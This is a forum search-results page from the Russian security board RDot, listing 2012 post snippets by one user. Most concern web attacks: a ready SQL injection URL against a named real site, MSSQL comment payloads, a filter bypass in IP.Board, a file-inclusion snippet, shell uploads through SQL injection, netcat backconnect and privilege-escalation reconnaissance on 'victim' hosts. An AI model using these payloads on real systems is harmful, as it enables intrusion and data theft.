Вернуться   RDot: White Hat Security Community > Поиск по форуму

Показано с 1 по 25 из 84.
На поиск затрачено 0.02 сек.
Поиск: Сообщения от: Lostnull
Раздел: Web-среда/Web-applications 24.05.2012, 20:30
Ответов: 3,618
Просмотров: 3,281,699
Автор Lostnull
azid Я конечно могу быть не прав, но ты ковыряешь...

azid Я конечно могу быть не прав, но ты ковыряешь IP.Board
Код
$_tmp = strtolower( $this->remove_all_quotes($the_query) );

if ( preg_match( "#(?:/\*|\*/)#i", $_tmp ) )
{
$this->fatal_error(...
Раздел: Web-среда/Web-applications 16.05.2012, 16:09
Ответов: 3,618
Просмотров: 3,281,699
Автор Lostnull
При авторизации, отображается ip с которого...

При авторизации, отображается ip с которого зашел.
Менял хидеры X-Forwarded-For, CLIENT_IP, X_COMING_FROM. В результате все равно реальный айпи.
Какими хидерами еще может чекать скрипт IP?
Раздел: Web-среда/Web-applications 04.05.2012, 03:29
Ответов: 3,618
Просмотров: 3,281,699
Автор Lostnull
Nightmare ...

Nightmare
http://www.itspot.ru/index.php?id=-146+union+all+select+concat(unhex(Hex(cast(user()+as+char)))),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
Раздел: Web-среда/Web-applications 02.05.2012, 18:40
Ответов: 3,618
Просмотров: 3,281,699
Автор Lostnull
Ситуация в следующем. Имею следующий код ...

Ситуация в следующем.
Имею следующий код

define('ROOT_PATH','/home/httpd/vhosts/mysite.com/httpdocs');
include (ROOT_PATH.'/inc/'.$_GET['lang'].'.php');

И имею open_basedir...
Раздел: Web-среда/Web-applications 02.05.2012, 01:35
Ответов: 3,618
Просмотров: 3,281,699
Автор Lostnull
Shram Товарищ, где есть одна уязвимость, всегда...

Shram Товарищ, где есть одна уязвимость, всегда найдется другая. Не пойму, зачем тратить неделю на изучение xss на жертве?
Авторизуемся и фигачим например...
Раздел: Криптография/Cryptography 01.05.2012, 15:43
Ответов: 821
Просмотров: 704,394
Автор Lostnull
e9e3bca01701e9d86416dfaa71e10be4 ...

e9e3bca01701e9d86416dfaa71e10be4
2dea5f78c17aab999a83c4382d463e10
Раздел: Web-среда/Web-applications 29.04.2012, 00:23
Ответов: 3,618
Просмотров: 3,281,699
Автор Lostnull
BECHED aka Root-access 1. Естественно после...

BECHED aka Root-access
1. Естественно после заливки через load_file проверил содержимое шелла.
2.class Session {
function Session() {
session_start();
}

public function...
Раздел: Web-среда/Web-applications 28.04.2012, 23:43
Ответов: 3,618
Просмотров: 3,281,699
Автор Lostnull
Нашел скуль права рут, залиться не могу не в одну...

Нашел скуль права рут, залиться не могу не в одну папку, админ явно права поставил как надо.
Прочитал индекс, увидел занимательный код.
<?php
include_once 'lib/session.php';
$session = new...
Раздел: Квесты/CTF 26.04.2012, 22:12
Ответов: 9
Просмотров: 11,782
Автор Lostnull
Уже почитал одно задание Another weird link –...

Уже почитал одно задание Another weird link – complex remote service, что сказать жесть как бы, боевые и еще раз боевые условия, поэтому не люблю квесты ... И дело не в развитии мышления и различных...
Раздел: Квесты/CTF 26.04.2012, 18:53
Ответов: 9
Просмотров: 11,782
Автор Lostnull
BECHED aka Root-access Ну человек ссылки...

BECHED aka Root-access Ну человек ссылки выкладывай если не очень занят, а про дружбу знал с чикенами =). В паблик мало выходит вот поэтому многое интересное.
Раздел: Квесты/CTF 26.04.2012, 16:46
Ответов: 9
Просмотров: 11,782
Автор Lostnull
Ребята как бы грац с 5-ым местом...

Ребята как бы грац с 5-ым местом http://prequals.nuitduhack.com/ranking.html, видосы, или хотя бы пару заданий с решением от вас ждать? И вопрос чисто от себя, в команде MoreSmokedLeetChicken ребята...
Раздел: Оффтоп/Offtopic 18.04.2012, 13:32
Ответов: 6
Просмотров: 7,305
Автор Lostnull
Белый Тигр стойка 100$, все радиаторы + 2 тюбика...

Белый Тигр стойка 100$, все радиаторы + 2 тюбика термопасты около 100$, два вентиля 50$.
Прелесть всего этого, что в стойку можно вторую машинку впихнуть,ряд сата винтов, которые достаются за пару...
Раздел: Оффтоп/Offtopic 18.04.2012, 03:48
Ответов: 6
Просмотров: 7,305
Автор Lostnull
Аналогичная проблема была, покупал б/у настенный...

Аналогичная проблема была, покупал б/у настенный серверный шкаф. Снимал вентилятор с кулера, менял радиатор на медный или аналог, выбирал из пассивки (те радиаторы, которые в корпус не входят...
Раздел: Повышение привилегий/Privilege escalation 17.04.2012, 16:32
Ответов: 2
Просмотров: 11,351
Автор Lostnull
Linux 2.6.18-238.9.1.el5

1. uname -a
[CODE]Linux blabla.net 2.6.18-238.9.1.el5 #1 SMP Tue Apr 12 18:10:13 EDT 2011 x86_64 x86_64 x86_64 GNU/Linux[/CODE]
2. mount
[CODE]/dev/sda1 on / type ext3...
Раздел: Оффтоп/Offtopic 12.04.2012, 22:18
Ответов: 10
Просмотров: 11,820
Автор Lostnull
snake Опять хумор уровня ачата? Ничего если все...

snake Опять хумор уровня ачата? Ничего если все написано на асп? Тогда можно было подьебать, типа вин решето, на хабре + словил бы однозначно.
Раздел: Оффтоп/Offtopic 11.04.2012, 19:28
Ответов: 10
Просмотров: 11,820
Автор Lostnull
deface cmd5.ru

Китайцы добрались до такого хорошего сервиса, зачем только?
На главной любуется hacked by ЮТШсЕФаЋзгЃЌQQЃК991142820
Раздел: Оффтоп/Offtopic 10.04.2012, 15:38
Ответов: 2
Просмотров: 6,561
Автор Lostnull
Centos и backconnect

Как я понял, nc в центос, фряхе не воспринимает аргумент -p, ну это ладно, так же по дефолту не биндит порт из-за iptables. Все решаемо. Беру бэк https://rdot.org/forum/showthread.php?t=1386 пост №1,...
Раздел: Оффтоп/Offtopic 10.04.2012, 14:43
Ответов: 8
Просмотров: 8,018
Автор Lostnull
Nightmare orb прав, происходит сжатие данных при...

Nightmare orb прав, происходит сжатие данных при скачке txt,sql,html и т.д., попробуй запихнуть дамп в тарбол получишь реальную скорость,т.е. 1.sql(1гиг)=1.tar.gz(100метров)=1час закачки.
Раздел: Оффтоп/Offtopic 09.04.2012, 22:48
Ответов: 2
Просмотров: 5,589
Автор Lostnull
DrakonHaSh Я так понимаю под тест раскрутки...

DrakonHaSh
Я так понимаю под тест раскрутки скули, готовый образ не найдешь, собрать думаю не составит труда, да и минус 30 минут думаю роли не играют....
Раздел: Web-среда/Web-applications 09.04.2012, 17:46
Ответов: 3,618
Просмотров: 3,281,699
Автор Lostnull
DrakonHaSh MSSQL Comment Out Query 1)/* ...

DrakonHaSh
MSSQL
Comment Out Query
1)/*
2)--
3)%00
Раздел: Web-среда/Web-applications 05.04.2012, 17:02
Ответов: 3,618
Просмотров: 3,281,699
Автор Lostnull
Jokester Извиняйте, мозг неправильно сработал,...

Jokester Извиняйте, мозг неправильно сработал, при подстановке () 500 ошибка, подумал фильтр, пересмотрел понял, что тупанул. Пришел к выводу блайнд мс акцесс.
Consistent...
Раздел: Web-среда/Web-applications 05.04.2012, 15:44
Ответов: 3,618
Просмотров: 3,281,699
Автор Lostnull
Consistent Жесткий фильтр, фильтруются скобки,...

Consistent Жесткий фильтр, фильтруются скобки, комментарии и т.д. Не вижу пути обхода.
Раздел: Web-среда/Web-applications 04.04.2012, 02:09
Ответов: 3,618
Просмотров: 3,281,699
Автор Lostnull
Подниму все таки тему, как определить жертва на...

Подниму все таки тему, как определить жертва на впс'е или дедике?
По каким признакам определить openvz,kvm,xen,vmware имея залитый шелл?
p.s. вопрос вообщем к гуру линупса
Раздел: Web-среда/Web-applications 03.04.2012, 01:57
Ответов: 3,618
Просмотров: 3,281,699
Автор Lostnull
Vollkorn Чудеса в том, что человек спросил...

Vollkorn Чудеса в том, что человек спросил именно в данном примере/случае, а не про способности твоей экстрасенсорики.
з.ы. извиняйте за оффтоп.
Раздел: Оффтоп/Offtopic 31.03.2012, 14:08
Ответов: 69
Важно: Книги
Просмотров: 129,935
Автор Lostnull
"Just for fun" Линус Торвальдс, довольно...

"Just for fun" Линус Торвальдс, довольно интересно было почитать про становление автора + утверждения отца по поводу носа.
Показано с 1 по 25 из 84.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot